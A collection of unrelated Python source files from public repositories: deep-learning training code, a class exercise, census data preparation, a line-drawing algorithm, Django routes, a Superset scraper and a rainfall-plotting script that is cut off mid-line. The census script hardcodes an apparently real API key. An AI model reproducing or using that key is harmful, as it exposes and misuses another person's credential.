feed_dict=None)\n\t\t\t\tepoch = step // args.epoch_size\n # Train for one epoch\n\t\t\t\ttrain(args, sess, epoch, image_list, label_list, index_dequeue_op, enqueue_op, image_paths_placeholder, labels_placeholder,\n\t\t\t\t\tlearning_rate_placeholder, phase_train_placeholder, batch_size_placeholder, global_step, \n\t\t\t\t\ttotal_loss, train_op, redun, summary_op, summary_writer, regularization_losses, args.learning_rate_schedule_file)\n\n # Save variables and the metagraph if it doesn't exist already\n\t\t\t\tsave_variables_and_metagraph(sess, saver, summary_writer, model_dir, subdir, step)\n\n\tsess.close()\n\treturn model_dir\n\n\ndef train(args, sess, epoch, image_list, label_list, index_dequeue_op, enqueue_op, image_paths_placeholder, labels_placeholder, \n\tlearning_rate_placeholder, phase_train_placeholder, batch_size_placeholder, global_step, \n\tloss, train_op, redun, summary_op, summary_writer, regularization_losses, learning_rate_schedule_file):\n\tbatch_number = 0\n\n\tif args.learning_rate>0.0:\n\t\tlr = args.learning_rate\n\telse:\n\t\tlr = framework.get_learning_rate_from_file(learning_rate_schedule_file, epoch)\n\n\tindex_epoch = sess.run(index_dequeue_op)\n\tlabel_epoch = np.array(label_list)[index_epoch]\n\timage_epoch = np.array(image_list)[index_epoch]\n \n # Enqueue one epoch of image paths and labels\n\tlabels_array = np.expand_dims(np.array(label_epoch),1)\n\timage_paths_array = np.expand_dims(np.array(image_epoch),1)\n\tsess.run(enqueue_op, {image_paths_placeholder: image_paths_array, labels_placeholder: labels_array})\n\n # Training loop\n\ttrain_time = 0\n\twhile batch_number < args.epoch_size:\n\t\tstart_time = time.time()\n\t\tfeed_dict = {learning_rate_placeholder: lr, phase_train_placeholder:True, batch_size_placeholder:args.batch_size}\n\t\tif (batch_number % 100 == 0):\n\t\t\terr, _, _, step, reg_loss, summary_str = sess.run([loss, train_op, redun, global_step, regularization_losses, summary_op], feed_dict=feed_dict)\n\t\t\tsummary_writer.add_summary(summary_str, global_step=step)\n\t\telse:\n\t\t\terr, _, _, step, reg_loss = sess.run([loss, train_op, redun, global_step, regularization_losses], feed_dict=feed_dict)\n\t\tduration = time.time() - start_time\n\t\tprint('Epoch: [%d][%d/%d]\\tTime %.3f\\tLoss %2.3f\\tRegLoss %2.3f' %\n\t\t\t(epoch, batch_number+1, args.epoch_size, duration, err, np.sum(reg_loss)))\n\t\tbatch_number += 1\n\t\ttrain_time += duration\n # Add validation loss and accuracy to summary\n\tsummary = tf.Summary()\n #pylint: disable=maybe-no-member\n\tsummary.value.add(tag='time/total', simple_value=train_time)\n\tsummary_writer.add_summary(summary, step)\n\treturn step\n\n\ndef save_variables_and_metagraph(sess, saver, summary_writer, model_dir, model_name, step):\n # Save the model checkpoint\n\tprint('Saving variables')\n\tstart_time = time.time()\n\tcheckpoint_path = os.path.join(model_dir, 'model-%s.ckpt' % model_name)\n\tsaver.save(sess, checkpoint_path, global_step=step, write_meta_graph=False)\n\tsave_time_variables = time.time() - start_time\n\tprint('Variables saved in %.2f seconds' % save_time_variables)\n\tmetagraph_filename = os.path.join(model_dir, 'model-%s.meta' % model_name)\n\tsave_time_metagraph = 0 \n\tif not os.path.exists(metagraph_filename):\n\t\tprint('Saving metagraph')\n\t\tstart_time = time.time()\n\t\tsaver.export_meta_graph(metagraph_filename)\n\t\tsave_time_metagraph = time.time() - start_time\n\t\tprint('Metagraph saved in %.2f seconds' % save_time_metagraph)\n\tsummary = tf.Summary()\n #pylint: disable=maybe-no-member\n\tsummary.value.add(tag='time/save_variables', simple_value=save_time_variables)\n\tsummary.value.add(tag='time/save_metagraph', simple_value=save_time_metagraph)\n\tsummary_writer.add_summary(summary, step)\n\ndef parse_arguments(argv):\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--logs_base_dir', type=str, \n\t\thelp='Directory where to write event logs.', default='~/logs/')\n\tparser.add_argument('--models_base_dir', type=str,\n help='Directory where to write trained models and checkpoints.', default='~/models/')\n\tparser.add_argument('--gpu_memory_fraction', type=float,\n help='Upper bound on the amount of GPU memory that will be used by the process.', default=1.0)\n\tparser.add_argument('--pretrained_model', type=str,\n help='Load a pretrained model before training starts.')\n\tparser.add_argument('--data_dir', type=str,\n help='Path to the data directory containing aligned face patches. Multiple directories are separated with colon.',\n default='~/data/SFEW/Train')\n\tparser.add_argument('--model_def', type=str,\n help='Model definition. Points to a module containing the definition of the inference graph.', default='models.covpoolnet')\n\tparser.add_argument('--max_nrof_epochs', type=int,\n help='Number of epochs to run.', default=500)\n\tparser.add_argument('--batch_size', type=int,\n help='Number of images to process in a batch.', default=128)\n\tparser.add_argument('--image_size', type=int,\n help='Image size (height, width) in pixels.', default=100)\n\tparser.add_argument('--epoch_size', type=int,\n help='Number of batches per epoch.', default=1000)\n\tparser.add_argument('--embedding_size', type=int,\n help='Dimensionality of the embedding.', default=128)\n\tparser.add_argument('--random_crop', \n help='Performs random cropping of training images. If false, the center image_size pixels from the training images are used. ' +\n 'If the size of the images in the data directory is equal to image_size no cropping is performed', action='store_true')\n\tparser.add_argument('--random_flip', \n help='Performs random horizontal flipping of training images.', action='store_true')\n\tparser.add_argument('--random_rotate', \n help='Performs random rotations of training images.', action='store_true')\n\tparser.add_argument('--keep_probability', type=float,\n help='Keep probability of dropout for the fully connected layer(s).', default=1.0)\n\tparser.add_argument('--weight_decay', type=float,\n help='L2 weight regularization.', default=0.0)\n\tparser.add_argument('--decov_loss_factor', type=float,\n help='DeCov loss factor.', default=0.0)\n\tparser.add_argument('--center_loss_factor', type=float,\n help='Center loss factor.', default=0.0)\n\tparser.add_argument('--center_loss_alfa', type=float,\n help='Center update rate for center loss.', default=0.95)\n\tparser.add_argument('--optimizer', type=str, choices=['ADAGRAD', 'ADADELTA', 'ADAM', 'RMSPROP', 'MOM'],\n help='The optimization algorithm to use', default='ADAGRAD')\n\tparser.add_argument('--learning_rate', type=float,\n help='Initial learning rate. If set to a negative value a learning rate ' +\n 'schedule can be specified in the file \"learning_rate_schedule.txt\"', default=0.1)\n\tparser.add_argument('--learning_rate_decay_epochs', type=int,\n help='Number of epochs between learning rate decay.', default=100)\n\tparser.add_argument('--learning_rate_decay_factor', type=float,\n help='Learning rate decay factor.', default=1.0)\n\tparser.add_argument('--moving_average_decay', type=float,\n help='Exponential decay for tracking of training parameters.', default=0.9999)\n\tparser.add_argument('--seed', type=int,\n help='Random seed.', default=666)\n\tparser.add_argument('--nrof_preprocess_threads', type=int,\n help='Number of preprocessing (data loading and augumentation) threads.', default=4)\n\tparser.add_argument('--log_histograms', \n help='Enables logging of weight/bias histograms in tensorboard.', action='store_true')\n\tparser.add_argument('--learning_rate_schedule_file', type=str,\n help='File containing the learning rate schedule that is used when learning_rate is set to to -1.', default='data/learning_rate_schedule.txt')\n\treturn parser.parse_args(argv)\n \n\nif __name__ == '__main__':\n\tmain(parse_arguments(sys.argv[1:]))\n","repo_name":"d-acharya/CovPoolFER","sub_path":"conv_feature_pooling/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15433,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"37"} +{"seq_id":"11316548532","text":"from re import A\nfrom claseAparatoElectronico import AparatoElectronico\n\nclass Heladera(AparatoElectronico):\n __capacidad_litros: float\n __freezer: bool\n __ciclica: bool\n\n def __init__(self, **datos):\n self._validar_flotante(datos['capacidad_litros'])\n self._validar_booleano(datos['freezer'])\n self._validar_booleano(datos['ciclica'])\n \n super().__init__(datos['marca'], datos['modelo'], datos['color'], datos['pais_fabricacion'], datos['precio_base'])\n self.__capacidad_litros = datos['capacidad_litros']\n self.__freezer = datos['freezer']\n self.__ciclica = datos['ciclica']\n\n def _validar_flotante(self, dato):\n if type(dato) != float:\n raise TypeError('Se esperaba un numero en Punto Flotante (numero real)')\n\n def _validar_booleano(self, dato):\n if type(dato) != bool:\n raise TypeError('Se esperaba un Booleano')\n\n def __str__(self):\n return super().__str__() + 'Capacidad (litros): {}\\nFreezer: {}\\nCiclica: {}\\nImporte de venta: {}'.format(self.__capacidad_litros,\n self.__freezer,\n self.__ciclica,\n super().get_importe_venta())\n\n def _calcular_porcentaje_adicional(self):\n porcentaje = 0\n\n if not self.__freezer: porcentaje += 1\n else: porcentaje += 5\n\n if self.__ciclica: porcentaje += 10\n\n return porcentaje","repo_name":"manurdls/POO-Unidad-3","sub_path":"Ejercicio 6/claseHeladera.py","file_name":"claseHeladera.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7510634151","text":"from utilities import categorize, mapping_household_marg_to_sample, mapping_person_marg_to_sample\nfrom censusHelper import Census\nimport re\nimport pandas as pd\n\n\nclass Dataset(object):\n def __init__(self, base_url, key, pums_url, geo_url, year, variables, variables_p=None):\n\n self.variables = variables\n self.variables_p = variables_p\n self.c = Census(key, base_url, year, pums_url, geo_url=geo_url)\n self._CACHE = {}\n\n def _to_columns(self, variables):\n\n \"\"\"\n Take a dictionary of tuples (cat, ACS cols)\n :return: all ACS columns to be extraced\n \"\"\"\n\n col_list = []\n for _, expr in variables.items():\n col_list = col_list + re.findall(r\"[\\w]+\", expr)\n\n return col_list\n\n @property\n def h_marginal_acs(self):\n \"\"\"\n This function transform the fields queried from the acs into\n categories\n :return: table with nrows=number of block group and ncolumns = number of category * number of sub caterogies\n within each category\n \"\"\"\n block_group_columns = self._to_columns(self.variables)\n df = self.c.query_block_group(block_group_columns)\n df['GEOID'] = df['state'] + df['county'] + df['tract'] + df['block group']\n cat_df = categorize(df, self.variables, index_cols=['GEOID'])\n\n if self.variables_p is not None:\n block_group_columns = self._to_columns(\n self.variables_p) # query acs persons level characteristics if necessary\n df_p = self.c.query_block_group(block_group_columns)\n df_p['GEOID'] = df_p['state'] + df_p['county'] + df_p['tract'] + df_p['block group']\n cat_p = categorize(df_p, self.variables_p, index_cols=['GEOID'])\n cat_df = cat_df.join(cat_p)\n\n return cat_df\n\n @property\n def pums_h(self):\n \"\"\"\n :return: households sample from the pums\n \"\"\"\n if 'pums_h' not in self._CACHE:\n pums_h = self.c.get_pums_h().set_index('SERIALNO')\n self._CACHE['pums_h'] = pums_h\n\n else:\n pums_h = self._CACHE['pums_h']\n\n return pums_h[pums_h.WGTP > 0]\n\n @property\n def pums_p(self):\n \"\"\"\n :return: person sample from the pums\n \"\"\"\n if 'pums_p' not in self._CACHE:\n pums_p = self.c.get_pums_p().set_index(['SERIALNO', 'SPORDER'])\n self._CACHE['pums_p'] = pums_p\n else:\n pums_p = self._CACHE['pums_p']\n return pums_p\n\n @property\n def sample_df(self):\n\n \"\"\"\n This function converts the households sample into a table with category variables\n The columns have the same name as the ones obtained from the ACS marginals\n Variables are equal to one if and only if they belong to the category defined in the ACS table\n The function also adds the characteristics from the individuals living in each household\n Indivudual-level characteristics are properly adjusted to account for the ratio of individual weight\n within the household\n :return:\n \"\"\"\n sample_df = pd.DataFrame(index=self.pums_h.index)\n cat = list(set(index[0] for index, _ in self.variables.items()))\n\n for index in cat: # convert sample variables into category using mapping_household_arg_to_sample\n\n sample_df[index] = self.pums_h.apply(mapping_household_marg_to_sample()[index], axis=1)\n sample_df = sample_df[sample_df[index] != '-99']\n\n data = pd.get_dummies(sample_df) # convert category into dummies\n\n if self.variables_p is not None: # add individual-level variables if any is included in the model\n sample_p = self.sample_p\n for v in list(sample_p.columns):\n sample_p[v] = sample_p[v] / self.weight # reweighting of individual-level variables\n data = data.join(sample_p)\n return data\n\n @property\n def weight(self):\n \"\"\"\n\n :return: housihold sampling weight\n \"\"\"\n if 'weight' not in self._CACHE:\n w = self.pums_h.WGTP\n self._CACHE['weigt'] = w\n else:\n w = self._CACHE['weigt']\n return w\n\n @property\n def sample_p(self):\n\n \"\"\"\n This function converts the persons sample into a table with category variables\n aggregated at the household level using persons weight\n The columns have the same name as the ones obtained from the ACS marginals (persons variables)\n :return:\n \"\"\"\n sample = pd.DataFrame(index=self.pums_p.index)\n cat = list(set(index[0] for index, _ in self.variables_p.items()))\n\n for index in cat: # create category from sample data\n sample[index] = self.pums_p.apply(mapping_person_marg_to_sample()[index], axis=1)\n sample = sample[sample[index] != '-99']\n\n df = pd.get_dummies(sample) # transform category into dummies\n W = self.pums_p['PWGTP']\n\n for v in df.columns:\n df[v] = df[v] * W # add individual weights\n\n df = df.reset_index().drop('SPORDER', axis=1)\n return df.groupby('SERIALNO').sum() # aggregate at the households levels\n\n\nif __name__ == \"__main__\":\n import numpy as np\n import os\n\n key = \"9d119de5f3de42bf4570723644941f4a4a707b8f\"\n base_url = 'https://api.census.gov/data/year/acs/acs5?get=NAME,variables&for=block%20group:*&in=in_field&key=your_key'\n geo_url = 'https://www2.census.gov/geo/docs/reference/codes/files/st08_co_cou.txt'\n pums_url = 'https://www2.census.gov/programs-surveys/acs/data/pums/year/5-Year/'\n\n eval_d = {\n\n (\"hhincome\", \"lt30\"):\n \"B19001_002E + B19001_003E + B19001_004E + \"\n \"B19001_005E + B19001_006E\",\n (\"hhincome\", \"gt30-lt60\"):\n \"B19001_007E + B19001_008E + B19001_009E + \"\n \"B19001_010E + B19001_011E\",\n (\"hhincome\", \"gt60-lt100\"): \"B19001_012E + B19001_013E\",\n (\"hhincome\", \"gt100-lt150\"): \"B19001_014E + B19001_015E\",\n (\"hhincome\", \"gt150\"): \"B19001_016E + B19001_017E\",\n\n (\"nhouseholds\", \"all\"): \"B19001_001E\",\n\n (\"tenure\", \"own\"): \"B25038_002E\",\n (\"tenure\", \"rent\"): \"B25038_009E\",\n\n (\"seniors\", \"yes\"): \"B11007_002E\",\n (\"seniors\", \"no\"): \"B11007_007E\",\n\n (\"children\", \"yes\"): \"B11005_002E\",\n (\"children\", \"no\"): \"B11005_011E\",\n\n (\"persons\", \"1 persons\"): \"B11016_010E\",\n (\"persons\", \"2 persons\"): \"B11016_003E + B11016_011E\",\n (\"persons\", \"3 persons\"): \"B11016_004E + B11016_012E\",\n (\"persons\", \"4 persons\"): \"B11016_005E + B11016_013E\",\n (\"persons\",\n \"5 persons or more\"): \"B11016_006E + B11016_014E + B11016_008E + B11016_016E + B11016_007E + B11016_015E\"\n\n }\n\n eval_p = {\n\n (\"sex\", \"male\"): \"B01001_002E * B11002_001E /B01001_001E\",\n (\"sex\", \"female\"): \"B01001_026E * B11002_001E /B01001_001E\",\n\n (\"age\", \"19 and under\"): \"(B01001_003E + B01001_004E + B01001_005E + \"\n \"B01001_006E + B01001_007E + B01001_027E + \"\n \"B01001_028E + B01001_029E + B01001_030E + \"\n \"B01001_031E)* B11002_001E / B01001_001E\",\n (\"age\", \"20 to 34\"): \"(B01001_008E + B01001_009E + B01001_010E + \"\n \"B01001_011E + B01001_012E + B01001_032E + \"\n \"B01001_033E + B01001_034E + B01001_035E + \"\n \"B01001_036E)* B11002_001E / B01001_001E\",\n (\"age\", \"35 to 59\"): \"(B01001_013E + B01001_014E + B01001_015E + \"\n \"B01001_016E + B01001_017E + B01001_037E + \"\n \"B01001_038E + B01001_039E + B01001_040E + \"\n \"B01001_041E)* B11002_001E / B01001_001E\",\n (\"age\", \"60 and above\"): \"(B01001_018E + B01001_019E + B01001_020E + \"\n \"B01001_021E + B01001_022E + B01001_023E + \"\n \"B01001_024E + B01001_025E + B01001_042E + \"\n \"B01001_043E + B01001_044E + B01001_045E + \"\n \"B01001_046E + B01001_047E + B01001_048E + \"\n \"B01001_049E)* B11002_001E /B01001_001E\",\n\n (\"grade\", \"PK\"): \"B14007_003E * B11002_001E / B01001_001E\",\n (\"grade\", \"K\"): \"B14007_004E * B11002_001E /B01001_001E\",\n (\"grade\", \"G1_4\"): \"(B14007_005E + B14007_006E + B14007_007E + B14007_008E)* B11002_001E / B01001_001E\",\n (\"grade\", \"G5_8\"): \"(B14007_009E + B14007_010E + B14007_011E + B14007_012E)* B11002_001E / B01001_001E\",\n (\"grade\", \"G9_12\"): \"(B14007_013E + B14007_014E + B14007_015E + B14007_016E)* B11002_001E / B01001_001E\",\n (\"grade\", \"college_under\"): \"B14007_017E * B11002_001E / B01001_001E\",\n (\"grade\", \"graduate\"): \"B14007_018E * B11002_001E / B01001_001E\",\n (\"grade\", \"not enrolled\"): \"(B14007_019E + B01001_001E - B14007_001E) * B11002_001E / B01001_001E\"\n\n }\n\n dataset = Dataset(base_url, key, pums_url, geo_url, 2016, eval_d, variables_p=eval_p)\n W = dataset.weight\n M = dataset.h_marginal_acs\n X = dataset.sample_df\n W = W.loc[X.index]\n\n var = list(M.drop('nhouseholds_all', axis=1).columns) + ['nhouseholds_all']\n X = X[var]\n M = M[var]\n\n # export csv files\n input_directory = 'C:\\\\Users\\\\xgitiaux\\\\Documents\\\\Research and Analysis\\\\Synthetizer\\\\Data\\\\Inputs'\n filename_x = os.path.join(input_directory, 'sample.csv')\n filename_m = os.path.join(input_directory, 'marginal.csv')\n filename_w = os.path.join(input_directory, 'weight.csv')\n X.to_csv(filename_x)\n M.to_csv(filename_m)\n W.to_csv(filename_w)\n\n # export numpy array\n M = np.array(M)\n X = np.array(X)\n\n filename_x = os.path.join(input_directory, 'sample.npy')\n filename_m = os.path.join(input_directory, 'marginal.npy')\n filename_w = os.path.join(input_directory, 'weight.npy')\n\n np.save(filename_x, X)\n np.save(filename_w, W)\n np.save(filename_m, M)\n","repo_name":"Gitiauxx/PopSynth","sub_path":"CreateData.py","file_name":"CreateData.py","file_ext":"py","file_size_in_byte":10094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23793088547","text":"class bresenham:\n\tdef __init__(self, start, end):\n\t\tself.start = list(start)\n\t\tself.end = list(end)\n\t\tself.path = []\n\n\t\tself.steep = abs(self.end[1]-self.start[1]) > abs(self.end[0]-self.start[0])\n\n\t\tif self.steep:\n\t\t\tprint ('Steep gradient')\n\t\t\tself.start = self.swap(self.start[0],self.start[1])\n\t\t\tself.end = self.swap(self.end[0],self.end[1])\n\n\t\tif self.start[0] > self.end[0]:\n\t\t\tprint ('Shallow gradient')\n\t\t\t_x0 = int(self.start[0])\n\t\t\t_x1 = int(self.end[0])\n\t\t\tself.start[0] = _x1\n\t\t\tself.end[0] = _x0\n\n\t\t\t_y0 = int(self.start[1])\n\t\t\t_y1 = int(self.end[1])\n\t\t\tself.start[1] = _y1\n\t\t\tself.end[1] = _y0\n\n\t\tdx = self.end[0] - self.start[0] #change in x\n\t\tdy = abs(self.end[1] - self.start[1]) #change in y\n\t\terror = 0\n\t\tderr = dy/float(dx) #gradient\n\n\t\tystep = 0\n\t\ty = self.start[1]\n\n\t\tif self.start[1] < self.end[1]: ystep = 1\n\t\telse: ystep = -1\n\n\t\tfor x in range(self.start[0],self.end[0]+1):\n\t\t\tif self.steep:\n\t\t\t\tself.path.append((y,x))\n\t\t\telse:\n\t\t\t\tself.path.append((x,y))\n\n\t\t\terror += derr\n\n\t\t\tif error >= 0.5:\n\t\t\t\ty += ystep\n\t\t\t\terror -= 1.0\n\n\t\tprint (start)\n\t\tprint (end)\n\t\tprint ()\n\t\tprint (self.start)\n\t\tprint (self.end)\n\n\tdef swap(self,n1,n2):\n\t\treturn [n2,n1]\n\nprint(\"Consider drawing a line on a raster grid where we restrict the allowable slopes of the line to the range: 0 < m <= 1 \\n\\n\")\nprint (\"Starting coordinates: \")\nx1=int(input(\"x: \"))\ny1=int(input(\"y: \"))\nprint (\"Ending coordinates: \")\nx2=int(input(\"x: \"))\ny2=int(input(\"y: \"))\nprint (\"\\n\")\nl = bresenham([x1,y1],[x2,y2])\nprint (\"\\nPoints to be plotted: \")\nprint (l.path)\n\n\nprint (\"Press return to exit.\")\nkey=input()\n","repo_name":"mmunsi2/python","sub_path":"pythonic/Code21_2_Bresenham.py","file_name":"Code21_2_Bresenham.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36295374734","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include('listings.urls')),\n url(r'^login/$', 'listings.views.login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page':'/'}),\n url(r'^register/$', 'listings.views.register'),\n url(r'^about/$', 'listings.views.about'),\n url(r'^calendar/$', 'listings.views.calendar'),\n url(r'^contact/$', 'listings.views.contact'),\n url(r'^faq/$', 'listings.views.faq'),\n url(r'^resources/$', 'listings.views.resources'),\n)\n","repo_name":"reparadocs/PolyProjects","sub_path":"PolyProjects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9812798181","text":"import urllib.request\nfrom urllib.error import URLError\n\nfrom bs4 import BeautifulSoup\nfrom django.core.cache import cache\nfrom sentry_sdk import capture_exception\n\nfrom .blocks_ui_text import _ChartBlockStrings\n\n# CACHE_TIMEOUT is in seconds.\nCACHE_TIMEOUT = 60 * 10\nCHARTS_CACHE_KEY = \"superset_charts\"\n\n\nclass SupersetChartRefs:\n def __init__(self, url=\"https://superset-myeqip.catalpa.build/chart/list/\"):\n self.url = url\n\n def _scrape_links_with_beautiful_soup(self):\n with urllib.request.urlopen(self.url) as response:\n html = response.read()\n soup = BeautifulSoup(html)\n all_links = soup(\"a\")\n return all_links\n\n def _get_superset_chart_page_anchors(self):\n try:\n return self._scrape_links_with_beautiful_soup()\n except URLError:\n raise URLError(\"Could not connect to My-EQIP's Superset.\")\n\n def __iter__(self):\n page_anchors = self._get_superset_chart_page_anchors()\n\n for chart_anchor in page_anchors:\n if \"slice_id\" not in chart_anchor[\"href\"]:\n # Ignore page anchors that don't link to charts.\n continue\n\n yield (chart_anchor[\"href\"], chart_anchor.text.strip())\n\n\ndef get_superset_chart_choices():\n chart_names_and_urls = cache.get(CHARTS_CACHE_KEY)\n\n if chart_names_and_urls is not None:\n return chart_names_and_urls\n\n try:\n chart_names_and_urls = tuple(SupersetChartRefs())\n cache.set(CHARTS_CACHE_KEY, chart_names_and_urls, timeout=CACHE_TIMEOUT)\n\n except URLError as e:\n capture_exception(e)\n chart_names_and_urls = [(None, _ChartBlockStrings.superset_connection_error)]\n return chart_names_and_urls\n","repo_name":"andrewerbs/eqis","sub_path":"portal/home/superset_helpers.py","file_name":"superset_helpers.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6438550857","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# precipitation.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: Danilo +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2023/06/20 11:48:29 by Danilo #+# #+# #\n# Updated: 2023/06/20 16:45:19 by Danilo ### ########.fr #\n# #\n# **************************************************************************** #\n\n\nimport glob\nimport argparse\nimport f90nml\nimport datetime\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport cmocean.cm as cmo\nimport cartopy.crs as ccrs\n\nimport matplotlib.colors as colors\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\n\ndef get_times_nml(namelist,model_data):\n ## Identify time range of simulation using namelist ##\n # Get simulation start and end dates as strings\n start_date_str = namelist['nhyd_model']['config_start_time']\n run_duration_str = namelist['nhyd_model']['config_run_duration']\n # Convert strings to datetime object\n start_date = datetime.datetime.strptime(start_date_str, '%Y-%m-%d_%H:%M:%S')\n \n run_duration = datetime.datetime.strptime(run_duration_str,'%d_%H:%M:%S')\n # Get simulation finish date as object and string\n finish_date = start_date + datetime.timedelta(days=run_duration.day,\n hours=run_duration.hour)\n ## Create a range of dates ##\n times = pd.date_range(start_date,finish_date,periods=len(model_data.Time)+1)[1:]\n return times\n\ndef get_exp_name(bench):\n expname = bench.split('/')[-1].split('run.')[-1]\n microp = expname.split('.')[0].split('_')[-1]\n cumulus = expname.split('.')[-1].split('_')[-1] \n return microp+'_'+cumulus\n\ndef get_model_accprec(model_data):\n if ('rainnc' in model_data.variables\n ) and ('rainc' in model_data.variables):\n acc_prec = model_data['rainnc']+model_data['rainc']\n # Get only micrphysics precipitation\n elif ('rainnc' in model_data.variables\n ) and ('rainc' not in model_data.variables):\n acc_prec = model_data['rainnc']\n # Get convective precipitation\n elif ('rainnc' not in model_data.variables\n ) and ('rainc' in model_data.variables):\n acc_prec = model_data['rainc'] \n elif ('rainnc' not in model_data.variables\n ) and ('rainc' not in model_data.variables):\n acc_prec = model_data.uReconstructMeridional[0]*0\n return acc_prec[-1]\n\n## Parser options ##\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-bdir','--bench_directory', type=str, required=True,\n help='''path to benchmark directory''')\nparser.add_argument('-i','--imerg', type=str, default=None, required=True,\n help='''path to IMERG data''')\nparser.add_argument('-o','--output', type=str, default=None,\n help='''output name to append file''')\n\n#args = parser.parse_args()\n\nargs = parser.parse_args(['-bdir', '/p1-nemo/danilocs/mpas/MPAS-BR/benchmarks/Catarina_physics-test/Catarina_250-8km.best-physics_sst/',\n '-i', '/p1-nemo/danilocs/mpas/MPAS-BR/met_data/IMERG/IMERG_20040321-20040325.nc'])\n\nbenchmarks = input(\"prompt experiments (24h, 48h, 48h_sst, 72h_sst, '2403-2903'): \")\n\nif (benchmarks == '48h_sst') or (benchmarks == '72h_sst'):\n ncol, nrow, imax = 2, 2, 3\nelif benchmarks == '2403-2903':\n ncol, nrow, imax = 1, 1, 1\nelse:\n ncol, nrow, imax = 3, 6, 18\nprint('Figure will have ncols:', ncol, 'rows:', nrow, 'n:', imax)\n\n## Start the code ##\nbenchs = glob.glob(args.bench_directory+'/run*')\n# Dummy for getting model times\nmodel_output = benchs[0]+'/latlon.nc'\nnamelist_path = benchs[0]+\"/namelist.atmosphere\"\n# open data and namelist\nmodel_data = xr.open_dataset(model_output)\nnamelist = f90nml.read(glob.glob(namelist_path)[0])\ntimes = get_times_nml(namelist,model_data)\n\nfirst_day = datetime.datetime.strftime(times[0], '%Y-%m-%d')\nlast_day = datetime.datetime.strftime(times[-2], '%Y-%m-%d')\nimerg = xr.open_dataset(args.imerg).sel(lat=slice(model_data.latitude[-1],\n model_data.latitude[0]),lon=slice(model_data.longitude[0],\n model_data.longitude[-1])).sel(time=slice(first_day,last_day))\nprint(imerg) \n \nprint('Using IMERG data from',first_day,'to',last_day) \nimerg_accprec = imerg.precipitationCal.cumsum(dim='time')[-1].transpose(\n 'lat', 'lon')\nprint('Maximum acc prec:',float(imerg_accprec.max()))\n\nprint('\\nOpening all data and putting it into a dictionary...')\ndata = {}\ndata['IMERG'] = imerg_accprec\n\nfor bench in benchs:\n \n experiment = get_exp_name(bench)\n print('\\n',experiment)\n \n model_data = xr.open_dataset(bench+'/latlon.nc').chunk({\"Time\": -1})\n model_data = model_data.assign_coords({\"Time\":times})\n\n acc_prec = get_model_accprec(model_data)\n acc_prec = acc_prec.where(acc_prec >= 0, 0)\n acc_prec_interp = acc_prec.interp(latitude=imerg_accprec.lat,\n longitude=imerg_accprec.lon,\n method='cubic',assume_sorted=False)\n interp = acc_prec_interp.where(acc_prec_interp >=0, 0).transpose(\n 'lat', 'lon')\n \n print('limits for prec data:',float(acc_prec.min()),float(acc_prec.max()))\n print('limits for interp prec data:',float(acc_prec_interp.min()),\n float(acc_prec_interp.max()))\n \n data[experiment] = {}\n data[experiment]['data'] = acc_prec\n data[experiment]['interp'] = interp\n\n# =============================================================================\n# Plot acc prec maps and bias\n# =============================================================================\nprint('\\nPlotting maps...')\nplt.close('all')\nfig1 = plt.figure(figsize=(10, 12))\nfig2 = plt.figure(figsize=(10, 12))\ngs1 = gridspec.GridSpec(6, 3)\ngs2 = gridspec.GridSpec(6, 3)\ndatacrs = ccrs.PlateCarree()\n\nif (benchmarks == '48h_sst'):\n prec_levels = np.arange(0,375,25)\n bias_levels = np.arange(-200,225,25)\n bias_norm = colors.TwoSlopeNorm(vmin=-200, vcenter=0, vmax=200)\nelif (benchmarks == '72h_sst'):\n prec_levels = np.arange(0,450,25)\n bias_levels = np.arange(-300,275,25)\n bias_norm = colors.TwoSlopeNorm(vmin=-300, vcenter=0, vmax=225)\n\ni = 0\nfor col in range(ncol):\n for row in range(nrow):\n \n if i == imax:\n break\n \n bench = benchs[i]\n experiment = get_exp_name(bench)\n print('\\n',experiment)\n \n prec = data[experiment]['data']\n prec_interp = data[experiment]['interp']\n \n for fig in [fig1,fig2]:\n \n ax = fig.add_subplot(gs1[row, col], projection=datacrs,frameon=True)\n \n ax.set_extent([-55, -30, -20, -35], crs=datacrs) \n gl = ax.gridlines(draw_labels=True,zorder=2,linestyle='dashed',\n alpha=0.8, color='#383838')\n gl.xlabel_style = {'size': 16, 'color': '#383838'}\n gl.ylabel_style = {'size': 16, 'color': '#383838'}\n gl.right_labels = None\n gl.top_labels = None\n if row != 5:\n gl.bottom_labels = None\n if col != 0:\n gl.left_labels = None\n \n ax.text(-50,-19,experiment)\n \n if fig == fig1:\n print('Plotting accumulate prec..')\n cf1 = ax.contourf(prec.longitude, prec.latitude, prec,\n cmap=cmo.rain, levels=prec_levels)\n print('prec limits:',float(prec.min()), float(prec.max()))\n else:\n print('Plotting bias..')\n bias = prec_interp-imerg_accprec\n cf2 = ax.contourf(imerg_accprec.lon, imerg_accprec.lat,bias,\n cmap=cmo.balance_r,\n levels=bias_levels, norm=bias_norm)\n print('bias limits:',float(bias.min()), float(bias.max()))\n ax.coastlines(zorder = 1)\n i+=1\n\nfor fig, cf in zip([fig1, fig2], [cf1, cf2]):\n cb_axes = fig.add_axes([0.85, 0.18, 0.04, 0.6])\n fig.colorbar(cf, cax=cb_axes, 